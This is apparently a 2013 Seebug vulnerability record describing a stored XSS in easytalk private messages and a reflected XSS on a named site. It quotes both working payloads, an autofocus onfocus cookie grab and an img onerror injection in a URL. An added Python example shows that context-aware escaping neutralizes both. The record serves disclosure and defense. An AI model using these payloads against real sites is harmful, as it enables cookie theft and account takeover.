easytalk: an XSS that fires wherever you point it

2013-12-29T00:00:00
ID SSV:96020
Type seebug
Reporter Root
Modified 2013-12-29T00:00:00

Description

Brief description:

Details:

The XSS is in private messages. Send the following XSS payload as the message body: <input onfocus=alert(document.cookie) autofocus>

[Screenshot 0001.jpg: https://images.seebug.org/upload/201310/12223754fd1afa98f3d978b1ce4edc815eec6579.jpg]

That is enough to trigger it and steal the cookie.

Proof of vulnerability:

As a bonus, here is a reflected one as well: http://www.hahawb.cn/?m=app&a=applist&keyword=%22%3E%3Cimg%20src=1%20onerror=%22alert%281%29%22/%3E
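Added example (Python), not part of the Seebug record or of easytalk itself: it takes the two payloads from this report (the stored private-message payload and the reflected keyword parameter), renders them through a hypothetical vulnerable template and through the same template with context-aware escaping, and uses Python's HTML parser to check which output still carries event-handler attributes. The template, the function names and the parser-based check are assumptions made for illustration; they show why escaping for the attribute and body contexts neutralizes both payloads, whereas a filter that only looks for <script> tags would miss both.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed inputs copied from the two payloads in the report (not live traffic).
STORED_PAYLOAD = '<input onfocus=alert(document.cookie) autofocus>'
REFLECTED_URL = ('http://www.hahawb.cn/?m=app&a=applist'
                 '&keyword=%22%3E%3Cimg%20src=1%20onerror=%22alert%281%29%22/%3E')

def keyword_from_url(url: str) -> str:
    """Decode the keyword parameter the way the server would receive it."""
    return parse_qs(urlsplit(url).query).get('keyword', [''])[0]

def render_vulnerable(message: str, keyword: str) -> str:
    """Hypothetical vulnerable template: user input concatenated raw. The keyword
    lands inside value="..." (a leading "> closes attribute and tag), the private
    message lands in the element body."""
    return (f'<input name="keyword" value="{keyword}">'
            f'<div class="msg">{message}</div>')

def render_hardened(message: str, keyword: str) -> str:
    """Same template with context-appropriate escaping: quote=True turns " into
    &quot; so the attribute cannot be closed, and escaping the body turns < into
    &lt; so the <input ... autofocus> payload is displayed as text, not parsed."""
    return (f'<input name="keyword" value="{html.escape(keyword, quote=True)}">'
            f'<div class="msg">{html.escape(message)}</div>')

class HandlerFinder(HTMLParser):
    """Records (tag, attribute) for every on* event handler the HTML parser sees
    on an actual tag. A check for this demo, not a production sanitizer."""
    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, _value in attrs:
            if name.lower().startswith('on'):
                self.handlers.append((tag, name))

def event_handlers(rendered: str) -> list:
    """Return the event-handler attributes present in a rendered page fragment."""
    finder = HandlerFinder()
    finder.feed(rendered)
    finder.close()
    return finder.handlers

if __name__ == '__main__':
    kw = keyword_from_url(REFLECTED_URL)
    print('vulnerable:', event_handlers(render_vulnerable(STORED_PAYLOAD, kw)))
    print('hardened:  ', event_handlers(render_hardened(STORED_PAYLOAD, kw)))
```

The vulnerable rendering yields both an img onerror and an input onfocus handler; the hardened rendering yields none, because the escaped text never becomes a tag.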